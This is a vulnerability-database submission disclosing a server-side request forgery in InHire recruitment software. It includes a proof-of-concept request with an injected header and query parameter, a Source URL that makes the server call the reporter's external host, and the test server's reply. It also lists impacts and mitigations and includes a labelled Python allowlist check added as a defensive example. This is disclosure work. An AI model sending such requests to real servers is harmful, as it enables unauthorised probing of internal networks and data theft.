| Title | Intera Group INHIRE SOFTWARE RECRUITMENT AND SELECTION - HR Unknown SSRF via HTTP Headers |
|---|
| Description | Title: InHire Recruitment Software – External SSRF via Malicious HTTP Header Injection |
|---|

Summary:

InHire is recruitment and selection software developed by the company InHire, part of the Intera group. During a security assessment, an external Server-Side Request Forgery (SSRF) vulnerability was discovered. The application processes manipulated HTTP headers in a way that allows an attacker to force the backend to initiate HTTP requests to arbitrary external servers. While this does not expose internal assets directly, it may still be leveraged in advanced exploitation scenarios.

PoC link: https://drive.google.com/file/d/1-doSYzFeLaKtd_b6RmpBtZ5qtsvu4gYI/view?usp=sharing

Proof-of-Concept Request:

```http
GET /?29chcotoo9=1 HTTP/1.1
Host: x.x.x.x:8000
Accept-Encoding: gzip, deflate, br, 29chcotoo9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, text/29chcotoo9
Accept-Language: en-US,29chcotoo9;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 29chcotoo9
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: "Chromium";v="136", "Not;A=Brand";v="24", "Google Chrome";v="136"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Origin: https://www.inhire.com.br
```

Response from attacker's test server:

```http
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 13:51:18 GMT
Server: BaseHTTP/0.6 Python/3.9.2
Content-Length: 37
Content-Type: text/plain; charset=utf-8
Connection: close

PoC SSRF IN INHIRE, YOU ARE VULNERABLE TO SSRF!!!
```

Potential Impact Scenarios:

| Impact | Details |
|---|---|
| Access to internal services | Can be adapted to reach internal APIs, databases, Redis, etc. |
| Bypass of network restrictions | May reach endpoints that only accept internal requests. |
| Data exfiltration | Server response may leak sensitive data or can be abused for tunneling. |
| Attack escalation | Can be chained with other vulnerabilities to escalate access or pivot. |

Recommended Mitigations:

- Restrict outbound traffic to known safe destinations.
- Sanitize and validate HTTP headers thoroughly.
- Enable outbound request logging and monitoring.
- Enforce allowlists for external HTTP targets.

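A reference check for the allowlist and outbound-restriction mitigations in the report, added here as an example; it is not InHire's code and not part of the submission. It assumes a hypothetical allowlist of partner hosts and takes a pluggable resolver so it can be exercised offline; in the reported pattern, this guard would run on any value taken from the query string or request headers before the backend fetches it.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the backend may contact (an assumption for this
# example); anything else, including an attacker-chosen host, is refused up front.
ALLOWED_HOSTS = {"api.example-partner.com", "cdn.example-partner.com"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def resolve_host(host):
    """Resolve a hostname to the set of addresses it currently maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_outbound_target(url, resolver=resolve_host):
    """True only if url names an allowlisted public host over http(s).

    Rejects non-http schemes, userinfo tricks (user@host), hosts missing from
    the allowlist, non-standard ports, and allowlisted names that resolve to a
    loopback, private, link-local or other non-global address, so a DNS record
    pointing back into the internal network is still refused.
    """
    try:
        parsed = urlparse(url)
        port = parsed.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False
    if parsed.username is not None or parsed.password is not None:
        return False
    host = parsed.hostname
    if not host or host.lower() not in ALLOWED_HOSTS or port not in ALLOWED_PORTS:
        return False
    try:
        addrs = resolver(host)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False
    if not addrs:
        return False
    for addr in addrs:
        try:
            if not ipaddress.ip_address(addr).is_global:
                return False
        except ValueError:  # resolver returned something that is not an IP
            return False
    return True
```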
| Source | https://X.X.X.com.br/?29chcotoo9=http://xxx.xx.xxx.xxx:8000/ |
|---|
| User | Samuel Jesus (UID 81288) |
|---|
| Submission | 05/30/2025 18:40 (1 Year ago) |
|---|
| Moderation | 06/15/2025 20:21 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 312613 [Intera InHire up to 20250530 29chcotoo9 server-side request forgery] |
|---|
| Points | 20 |
|---|